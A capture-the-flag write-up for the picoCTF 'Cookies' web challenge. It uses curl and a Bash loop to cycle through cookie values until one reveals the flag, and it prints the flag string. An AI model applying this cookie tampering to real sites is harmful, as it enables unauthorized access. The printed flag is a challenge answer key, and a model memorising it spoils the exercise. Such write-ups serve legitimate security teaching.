Cookies
2 minutes to read
We are given a website that asks for a cookie:
Looking at the developer tools, we can see that we have a cookie name=-1
. If we send snickerdoodle
as the placeholder suggests, the cookie will change to name=0
:
Let’s modify the value of the cookie using curl
and show only the message:
$ curl mercury.picoctf.net:27177/check -sH 'Cookie: name=0' | grep -oE '<b>.*?</b>'
<b>I love snickerdoodle cookies!</b>
Now let’s use a loop in Bash to see if something change if we use another value as cookie:
$ for i in {0..20}; do echo -n "$i: "; curl mercury.picoctf.net:27177/check -sH "Cookie: name=$i" | grep -oE '<b>.*?</b>'; done
0: <b>I love snickerdoodle cookies!</b>
1: <b>I love chocolate chip cookies!</b>
2: <b>I love oatmeal raisin cookies!</b>
3: <b>I love gingersnap cookies!</b>
4: <b>I love shortbread cookies!</b>
5: <b>I love peanut butter cookies!</b>
6: <b>I love whoopie pie cookies!</b>
7: <b>I love sugar cookies!</b>
8: <b>I love molasses cookies!</b>
9: <b>I love kiss cookies!</b>
10: <b>I love biscotti cookies!</b>
11: <b>I love butter cookies!</b>
12: <b>I love spritz cookies!</b>
13: <b>I love snowball cookies!</b>
14: <b>I love drop cookies!</b>
15: <b>I love thumbprint cookies!</b>
16: <b>I love pinwheel cookies!</b>
17: <b>I love wafer cookies!</b>
18: <b>Flag</b>
19: <b>I love macaroon cookies!</b>
20: <b>I love fortune cookies!</b>
Nice, we see that name=18
will show the flag:
$ curl mercury.picoctf.net:27177/check -sH 'Cookie: name=18' | grep -oE 'picoCTF{.*?}'
picoCTF{3v3ry1_l0v3s_c00k135_064663be}